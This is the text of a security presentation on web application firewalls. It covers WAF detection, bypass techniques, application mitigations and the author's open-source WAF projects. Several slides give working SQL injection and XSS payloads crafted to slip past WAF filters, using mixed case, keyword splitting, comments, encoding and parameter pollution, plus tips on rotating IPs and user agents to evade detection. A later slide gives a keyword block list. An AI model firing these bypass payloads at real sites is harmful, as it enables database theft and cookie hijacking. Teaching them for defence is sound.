In this presentation, you can learn many practical resources about WAF, how you can create your WAF, and how you can bypass protections in common WAFs.
2. Whoamy
●
Antonio Costa aka Cooler_
●
Projects: Github.com/CoolerVoid
●
Contact: coolerlair@gmail.com
●
Cyber security engineer
●
Programmer/developer
●
13 years of work experience with pentest,
codereview, development, incident detection,
incident response and hardening.
6. Other resources for rules
●
Block per IP adress
●
Leak mitigation(responses)
●
Insert anti-csrf tokens
●
Detect UserAgent anomaly
●
Strong blocklist
●
Denial of service
●
Force hardening in custom
endpoints Headers
HSTS, anti-xss, CSP, nosniff…
●
Insert cookie attributes, httponly
Secure...
7. Practical point view
●
Detection the type of WAF
●
Common attacks in WAF
●
Custom attacks to bypass WAF
●
Attack Mitigation in WAF
●
Attack Mitigation in application
●
Create your custom WAF
●
My OpenSource Projects
●
Attack and Protection!
8. Detection
You can search a pattern in cookie, header response…
Each WAF have a different context in response.
●
https://svn.nmap.org/nmap/scripts/http-waf-detect.nse
●
https://github.com/sandrogauci/wafw00f
●
http://code.google.com/p/imperva-detect/
9. Common attacks
●
WAFs can be configured to actively block requests and traffic that
violate the WAF rule-sets. This is a useful feature, but needs to be used
judiciously, an WAF that is in over-active blocking mode prevents
legitimate traffic from reaching the Web server, making the application
unusable.
●
Sometimes have a weak rules, that don’t match attacks to block.
10. Mixed case
●
Cool trick to bypass a common rule is mixed case, here the big
purpose is bypass absence of case sensitive rules.
●
SELECT, SeLect, selEcT… UnIOn, unIoN...
●
Look this following:
● /sell/cars.php?search=<script>alert(document.cookie)</script>
● /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>
11. Replace Keywords
●
Replace Keywords is common function in WAFs, this resource erase
critical points in attacks, but you can bypass this, you need a point to
insert attack word between payload.
●
Look this following:
● /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9
● /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
12. Spaces to comment
●
Replace points to comments is very good way to bypass WAF.
●
Look this following:
●
/sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/
1,2,3,database()– -
●
/sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!
●
table_name*/)+FrOM /*information_schema*/.tables /*!WHERE
*/+/*!TaBlE_ScHeMa*/+like+database()– -
13. Encode abuse
●
Other trick to bypass, is the abuse of encode, sometimes
application can render encoded strings...
●
Look this following:
<script>alert(document.cookie)</script>
●
Url encode:
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
●
64 encode:
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=
14. Buffer Overflow
●
When WAF service don’t have a proper validation in inputs, you can
see this problem in fuzzing tests...
●
Look this following:
●
/cars/id/page/=-25+and+(select
2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7…
●
id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...)
+uNIoN+seLecT+2,3,version()...
15. HTTP Parameter Pollution(HPP)
The following request doesn’t allow anyone to conduct an attack:
●
/?id=1;select+4,5,6+from+users+where+id=1--
●
This request will be successfully performed using HPP.
●
/?id=1;select+4&id=5,6+from+users+where+id=1--
●
Successful conduction of an HPP attack bypassing WAF depends on
the environment of the application being attacked
16. Using HTTP Parameter
Fragmentation (HPF)
execute_query("select * from table where a=".input_a." and b=".input_b);
execute_query("select * from table where a=".input_a." and b=".input_b."
limit ".input_c);
●
The following request doesn’t allow anyone to conduct an attack
●
/?a=1+union+select+1,2/*
These requests is a possible attack using HPF
●
/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
• The SQL requests become
●
select * from table where a=1 union/* and b=*/select 1,2 select * from table
where a=1 union/* and b=*/select 1,pass/*limit */from users--
17. Time machine
●
Random delay each request
●
Random UserAgent per request
●
Random IP address per request(Proxy)
●
Bypass
Intrusion prevention system (IPS)
Web application firewall (WAF)
18. Automate
●
Project to change your list of payloads using a lot techniques to help bypass
a WAF.
●
https://github.com/CoolerVoid/payloadmask
19. Fuzzing / Brute
●
0d1n is a tool for automating customized attacks
against web applications.
●
Open Source
●
Use thread pool
●
Github.com/CoolerVoid/0d1n
23. Application mitigations
●
Validation and proper sanitization(remove DOM, js, HTML…).
●
Prepared Statements (with Parameterized Queries).
●
Create a function that check a Block list with common words in
attacks (eval,timeout,union,--, select, delete, version,
benchmark, sleep, /**/...), set all string to lower case before
scan pattern.
●
Study your ORM(SQLalchemy, Hibernate...) to prevent pitfalls
in resources.
●
Follow Mitre and OWASP tricks to hardening etc...
25. Create your WAF
●
Study five years around sockets and
raw sockets
●
Demultiplexer problems
(select(), epoll(),
kqueue(), pthreads(), MPI…)
●
Race conditions
●
Testing a lot list of libraries
libuv(used by node)
libevent(old lib for core of nginx)
Python Twisted
26. Create your WAF
●
WAF from the scratch RaptorWAF
●
Demultiplexer use select() with
pthreads
●
Have a problem, race conditions
in millions connections(lock with
mutex cannot save).
●
Easy to understand
●
Github.com/CoolerVoid/RaptorWAF
28. Create your WAF
●
OctopusWAF
●
Uses LibEvent
●
Have support to heavy connections
●
Uses lib Injection to detect SQLi
●
Github.com/CoolerVoid/OctopusWAF